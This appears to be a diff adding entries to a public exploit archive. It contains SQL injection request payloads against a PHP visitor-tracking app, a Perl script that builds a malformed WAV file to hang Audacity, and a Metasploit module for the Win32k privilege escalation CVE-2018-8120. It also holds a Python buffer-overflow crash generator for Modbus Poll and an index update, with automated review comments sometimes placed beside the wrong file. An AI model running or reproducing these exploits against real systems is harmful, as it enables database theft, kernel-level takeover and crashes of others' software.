+fname=%22%22%27%27%27%20UniON%20SelECt%20nuLL%2cnuLL%2cCoNCat((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL--%20Efe
+HTTP/1.1 200 OK
+Date: Fri, 19 Oct 2018 20:58:30 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3175
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/repeat_verify-n.php
+# Post / lname=[SQL]
+
+POST /[PATH]/repeat_verify-n.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 197
+lname=%'%20anD%20(SELecT%20112%20FRom(SelECT%20COunT(*),COncAT(version(),(SElecT%20(Elt(112=112,1))),dataBAse(),FLooR(RAnD(0)*2))x%20FroM%20INforMATIon_SCheMA.PluGINS%20GRouP%20By%20x)a)%20AnD'%'='
+HTTP/1.1 200 OK
+Date: Fri, 19 Oct 2018 21:03:13 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 817
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/repeat_verify.php?me=[SQL]
+
+GET /[PATH]/repeat_verify.php?me=1%20UNION%20SeLECt%20NuLl%2cNuLl%2cCOnCaT((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 19 Oct 2018 21:13:06 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2714
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/windows/dos/45644.pl b/exploits/windows/dos/45644.pl
new file mode 100755
index 000000000..5bad10792
--- /dev/null
+++ b/exploits/windows/dos/45644.pl
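Review bot: The PoC 3 heading `# http://localhost/repeat_verify.php?me=[SQL]` drops the `[PATH]` placeholder that every other heading uses and that its own request line carries (`/[PATH]/repeat_verify.php`); it should read `# http://localhost/[PATH]/repeat_verify.php?me=[SQL]`. PoCs 1 and 2 each add a `# Post / <param>=[SQL]` line under the URL while PoC 3 does not; a uniform `# Parameter:` line per PoC, with the method, would make the three entry points (`fname`, `lname` on repeat_verify-n.php; `me` on repeat_verify.php) scannable, and the title should name all three rather than `fname` alone. Vendor notification and remediation are again absent from the header.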
@@ -0,0 +1,98 @@
+# Exploit Title: AudaCity 2.3 - Denial of Service (PoC)
+# Author: Kağan Çapar
+# Discovery Date: 2018-10-19
+# Software Link: https://www.fosshub.com/Audacity.html
+# Vendor Homepage : https://www.audacityteam.org
+# Tested Version: 2.3
+# Tested on OS: Windows 10 x64/86 (Normal use CPU) & Windows 7 (High CPU usage) & Windows XP (High CPU usage)
+# other version should be affected
+
+# Steps to Reproduce: Run the perl exploit script, it will create a new
+# file with the name "lock.wav". Open Audatcity.exe
+# Go to File > Open > Import > Select "lock.wav file"
+# you will see a locking on software.
+
+# ! /usr/bin/perl
+
+# Dump of assembler code for function data:
+# 0x0000000000004040 <+0>: push %rdx
+# 0x0000000000004041 <+1>: rex.WB
+# 0x0000000000004042 <+2>: rex.RX
+# 0x0000000000004043 <+3>: rex.RX retq $0x158
+# 0x0000000000004047 <+7>: add %dl,0x41(%rdi)
+# 0x000000000000404a <+10>: push %rsi
+# 0x000000000000404b <+11>: rex.RB
+# 0x000000000000404c <+12>: rex.R
+# 0x000000000000404d <+13>: rex.R
+# 0x000000000000404e <+14>: rex.R
+# 0x000000000000404f <+15>: rex.R clc
+# 0x0000000000004051 <+17>: (bad)
+# 0x0000000000004052 <+18>: (bad)
+# 0x0000000000004053 <+19>: incl (%rcx)
+# 0x0000000000004055 <+21>: add %al,(%rcx)
+# 0x0000000000004057 <+23>: add %ah,(%rdx)
+# 0x0000000000004059 <+25>: push %rsi
+# 0x000000000000405a <+26>: add %al,(%rax)
+# 0x000000000000405c <+28>: rex.R lods %ds:(%rsi),%al
+# 0x000000000000405e <+30>: add %al,(%rax)
+# 0x0000000000004060 <+32>: add (%rax),%al
+# 0x0000000000004062 <+34>: adc %al,(%rax)
+# 0x0000000000004064 <+36>: add %al,(%rax)
+# 0x0000000000004066 <+38>: data16 (bad)
+# 0x0000000000004068 <+40>: movslq 0x0(%rsp,%rax,1),%esi
+# 0x000000000000406c <+44>: add %al,(%rax)
+# 0x000000000000406e <+46>: rex.W lods %ds:(%rsi),%al
+# 0x0000000000004070 <+48>: add %al,(%rax)
+# 0x0000000000004072 <+50>: fs (bad)
+# 0x0000000000004074 <+52>: je 0x40d7
+# 0x0000000000004076 <+54>: nop
+# 0x0000000000004077 <+55>: pop %rax
+# 0x0000000000004078 <+56>: add %eax,(%rax)
+# 0x000000000000407a <+58>: add %al,(%rax)
+# 0x000000000000407c <+60>: add %al,(%rax)
+# 0x000000000000407e <+62>: add %al,(%rax)
+# 0x0000000000004080 <+64>: add %al,(%rax)
+# 0x0000000000004082 <+66>: add %al,(%rax)
+# 0x0000000000004084 <+68>: add %al,(%rax)
+# 0x0000000000004086 <+70>: (bad)
+# 0x0000000000004087 <+71>: incl (%rax)
+# 0x0000000000004089 <+73>: add %al,(%rax)
+# 0x000000000000408b <+75>: add %bh,%bh
+# 0x000000000000408d <+77>: incl (%rax)
+# 0x000000000000408f <+79>: add %bh,%bh
+# 0x0000000000004091 <+81>: incl (%rax)
+# 0x0000000000004093 <+83>: add %bh,%bh
+# 0x0000000000004095 <+85>: incl (%rax)
+# 0x0000000000004097 <+87>: add %bh,%bh
+# 0x0000000000004099 <+89>: incl (%rax)
+# 0x000000000000409b <+91>: add %bh,%bh
+
+open(code, ">lock.wav");
+binmode(code);
+$data =
+"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
+"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
+"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" .
+"\x00\x00\x64\x61\x74\x61\x90\x58\x01\x00\x00\x00\x00\x00\x00\x00" .
+"\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\x00\x00" .
+"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" .
+"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" .
+"\xff\xff\x00\x00\xff\xff\x01\x00\x08\x00\x0b\x00\x0c\x00\x0b\x00" .
+"\x0c\x00\x09\x00\x07\x00\x0a\x00\x0a\x00\x07\x00\x0b\x00\x09\x00" .
+"\x08\x00\x0a\x00\x08\x00\x09\x00\x0a\x00\x0a\x00\x0a\x00\x09\x00" .
+"\x09\x00\x0a\x00\x0c\x00\x0c\x00\x0a\x00\x0b\x00\x0c\x00\x08\x00" .
+"\x0b\x00\x0d\x00\x0a\x00\x0c\x00\x0d\x00\x0a\x00\x0a\x00\x0a\x00" .
+"\x0c\x00\x0c\x00\x0d\x00\x10\x00\x0b\x00\x0d\x00\x0c\x00\x09\x00" .
+"\x0a\x00\x0e\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00\x0a\x00\x07\x00" .
+"\x08\x00\x05\x00\x08\x00\x0b\x00\x09\x00\x0b\x00\x08\x00\x08\x00" .
+"\x0b\x00\x09\x00\x07\x00\x08\x00\x07\x00\x09\x00\x0d\x00\x0c\x00" .
+"\x0b\x00\x0b\x00\x0a\x00\x0c\x00\x0f\x00\x0a\x00\x0a\x00\x0b\x00" .
+"\x0f\x00\x07\x00\x09\x00\x07\x00\x09\x00\x08\x00\x05\x00\x0a\x00" .
+"\x0a\x00\x07\x00\x08\x00\x0b\x00\x06\x00\x0d\x00\x0c\x00\x0c\x00" .
+"\x0b\x00\x0c\x00\x0b\x00\x09\x00\x0b\x00\x0b\x00\x09\x00\x0f\x00" .
+"\x08\x00\x0a\x00\x0f\x00\x0b\x00\x0d\x00\x0a\x00\x0a\x00\x09\x00" .
+"\x09\x00\x0d\x00\x10\x00\x0d\x00\x0b\x00\x0c\x00\x0e\x00\x09\x00" .
+"\x0c\x00\x0e\x00\x0a\x00\x0b\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00";
+
+print code $data;
+close(code);
\ No newline at end of file
diff --git a/exploits/windows/local/45653.rb b/exploits/windows/local/45653.rb
new file mode 100755
index 000000000..ba3eba541
--- /dev/null
+++ b/exploits/windows/local/45653.rb
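Review bot: `open(code, ">lock.wav")` ignores the return value and uses a bareword global filehandle, so if the file cannot be created (read-only directory, file held open by the player) the script prints nothing, writes nothing and still exits 0; there is also no `use strict; use warnings;`, which would have flagged the bareword. The idiomatic form is `open(my $fh, '>', 'lock.wav') or die "lock.wav: $!";` followed by `binmode($fh); print $fh $data;` and `close($fh) or die "close: $!";`. The `# ! /usr/bin/perl` on line 15 is an ordinary comment, not a shebang — a shebang needs `#!` with no space and must be the first line — so the file is not directly executable as the steps-to-reproduce imply; move a real `#!/usr/bin/perl` to line 1 or drop it. The 50-line `Dump of assembler code for function data:` block is a disassembly of the WAV bytes as if they were x86-64 code and documents nothing about the crash; a one-line comment on which chunk header field (the `fact`/`data` sizes at offsets 0x28–0x38, by inspection of the bytes) triggers the hang would be far more useful to a reader and to the vendor.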
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Post::Windows::Priv
+ include Msf::Exploit::FileDropper
+
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
+ 'Description' => %q{
+ This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
+ when the Win32k component fails to properly handle objects in memory. An attacker who
+ successfully exploited this vulnerability could run arbitrary code in kernel mode. An
+ attacker could then install programs; view, change, or delete data; or create new
+ accounts with full user rights.
+
+ This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'unamer', # Exploit PoC
+ 'bigric3', # Analysis and exploit
+ 'Anton Cherepanov', # Vulnerability discovery
+ 'Dhiraj Mishra ' # Metasploit
+ ],
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' => {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Targets' => [
+ [ 'Automatic', {} ],
+ [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+ [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+ ],
+ 'Payload' => {
+ 'Space' => 4096,
+ 'DisableNops' => true
+ },
+ 'References' => [
+ ['BID', '104034'],
+ ['CVE', '2018-8120'],
+ ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+ ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+ ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+ ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+ ],
+ 'DisclosureDate' => 'May 9 2018',
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def assign_target
+ if is_system?
+ fail_with(Failure::None, 'Session is already elevated')
+ end
+
+ if sysinfo['OS'] =~ /XP|NT/i
+ fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+ end
+
+ return target unless target.name == 'Automatic'
+
+ case sysinfo['Architecture']
+ when 'x64'
+ vprint_status('Targeting x64 system')
+ return targets[1]
+ when 'x86'
+ fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+ vprint_status('Targeting x86 system')
+ return targets[2]
+ end
+ end
+
+ def write_file_to_target(fname, data)
+ tempdir = session.sys.config.getenv('TEMP')
+ file_loc = "#{tempdir}\\#{fname}"
+ vprint_warning("Attempting to write #{fname} to #{tempdir}")
+ write_file(file_loc, data)
+ vprint_good("#{fname} written")
+ file_loc
+ rescue Rex::Post::Meterpreter::RequestError => e
+ elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+ fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
+ end
+
+ def check_arch
+ sys_arch = assign_target
+ if sys_arch.name =~ /x86/
+ return 'CVE-2018-8120x86.exe'
+ else sys_arch.name =~ /x64/
+ return 'CVE-2018-8120x64.exe'
+ end
+ end
+
+ def exploit
+ cve_fname = check_arch
+ rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
+ vprint_status("Reading payload from file #{rexe}")
+ raw = File.read(rexe)
+
+ rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
+ vprint_status("EXE's name is: #{rexename}")
+ exe = generate_payload_exe
+ tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
+
+ exe_payload = write_file_to_target(tempexename, exe)
+ vprint_status("Payload uploaded to temp folder")
+ cve_exe = write_file_to_target(rexename, raw)
+ command = "\"#{cve_exe}\" \"#{exe_payload}\""
+ vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
+ register_file_for_cleanup(exe_payload)
+
+ vprint_status("Executing command : #{command}")
+ cmd_exec_get_pid(command)
+ print_good('Exploit finished, wait for privileged payload execution to complete.')
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45641.py b/exploits/windows_x86/dos/45641.py
new file mode 100755
index 000000000..8ba6cba49
--- /dev/null
+++ b/exploits/windows_x86/dos/45641.py
@@ -0,0 +1,27 @@
+# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC)
+# Discovery by: Cemal Cihad ÇİFTÇİ
+# Discovery Date: 2018-10-19
+# Tested Version: 7.2.2
+# Vulnerability Type: DOS
+# Tested on OS: Windows XP Professional Service Pack 3
+# Vendor Homepage: https://www.modbustools.com
+# Download Link: https://www.modbustools.com/download.html
+
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
+# Now start the program. Now when you are inside of the program click Connection button and
+# click "connect". It will ask you for registration key. In the field: "Registration Key"
+# paste the copied content from "exploit.txt".
+# Now click "OK" and see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 4000
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 697137621..8af0f066f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
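Review bot: In `check_arch`, `else sys_arch.name =~ /x64/` is an `else` followed by a bare expression rather than an `elsif`: the match is evaluated and thrown away, so any target whose name does not contain "x86" silently selects the x64 binary. Compounding this, `assign_target` returns `nil` when `sysinfo['Architecture']` is neither 'x64' nor 'x86' (its `case` has no `else` branch), and `check_arch` then raises `NoMethodError` on `sys_arch.name` instead of a readable failure. The fix is three lines: `elsif sys_arch.name =~ /x64/`, `return 'CVE-2018-8120x64.exe'`, and a closing `else fail_with(Failure::BadConfig, "Unsupported target #{sys_arch.inspect}")`; with that in place the `nil` case is reported rather than crashed on. Minor: the author entry `'Dhiraj Mishra '` carries a trailing space, and `'DisclosureDate' => 'May 9 2018'` should be `'May 09 2018'` to match the framework's usual zero-padded form (not verifiable from this page).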
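Review bot: The bare `except:` at the end swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and discards the reason the file could not be created, which is exactly what a user hitting a permissions error needs to see; given the Python 2 print statements, `except IOError as e:` with `e` included in the message is the compatible fix. The `try` body also leaks the handle if `f.write` raises, since `f.close()` is only reached on success — `with open("exploit.txt", "w") as f: f.write(buffer)` closes it on every path. The `#!/usr/bin/python` line sits on line 17, after the header comments, where it is an ordinary comment and not a shebang; either move it to line 1 or drop it so the steps-to-reproduce ("run the python exploit script") hold.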
@@ -6147,6 +6147,14 @@ id,file,description,date,author,type,platform,port
 45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows,
 45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
 45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
+45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86,
+45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
+45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos,
+45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple,
+45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios,
+45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple,
+45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
+45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap 
Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10037,6 +10045,7 @@ id,file,description,date,author,type,platform,port
 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
+45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39991,7 +40000,7 @@ id,file,description,date,author,type,platform,port
 45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
 45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
 45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,80
-45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
+45228,exploits/php/webapps/45228.txt,"Countly - Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
 45230,exploits/php/webapps/45230.txt,"Twitter-Clone 1 - 'userid' SQL Injection",2018-08-21,L0RD,webapps,php,80
 45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware,
 45232,exploits/php/webapps/45232.txt,"Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)",2018-08-21,L0RD,webapps,php,
@@ -40154,3 +40163,11 @@ id,file,description,date,author,type,platform,port
 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
 45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
 45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
+45639,exploits/php/webapps/45639.txt,"MySQL Edit Table 1.0 - 'id' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45642,exploits/php/webapps/45642.txt,"School ERP Ultimate 2018 - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
+45643,exploits/java/webapps/45643.txt,"Oracle Siebel CRM 8.1.1 - CSV Injection",2018-10-22,"Sarath Nair",webapps,java,
+45645,exploits/php/webapps/45645.txt,"The Open ISES Project 3.30A - 'tick_lat' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45646,exploits/php/webapps/45646.txt,"School ERP Ultimate 2018 - 'fid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
+45656,exploits/php/webapps/45656.txt,"Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,